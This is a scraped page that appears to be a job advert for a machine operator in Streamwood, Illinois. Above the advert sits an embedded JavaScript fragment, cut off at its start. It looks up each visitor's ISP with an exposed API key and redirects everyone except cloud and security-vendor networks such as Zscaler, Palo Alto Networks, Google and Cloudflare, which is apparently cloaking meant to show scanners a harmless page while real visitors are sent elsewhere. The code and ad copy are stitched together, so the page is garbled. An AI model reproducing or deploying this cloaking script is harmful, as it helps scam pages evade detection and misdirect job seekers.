Machine Operator (Choose Shift)
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Machine Operator for the [AM/Day/PM] shift located in Streamwood, Illinois.
Responsibilities include:
- Operating and monitoring manufacturing machinery to ensure optimal performance
- Performing routine maintenance and inspections to identify issues
- Following safety protocols and maintaining a clean work environment
- Loading raw materials and unloading finished products
- Documenting production data accurately and timely
Skills needed:
- Attention to detail and strong focus on safety
- Ability to read and interpret technical instructions and gauges
- Good problem-solving skills and manual dexterity
- Ability to work efficiently in a team and independently
Benefits include competitive pay, health insurance, paid time off, and opportunities for growth. Join our team and contribute to a dynamic manufacturing environment in Streamwood!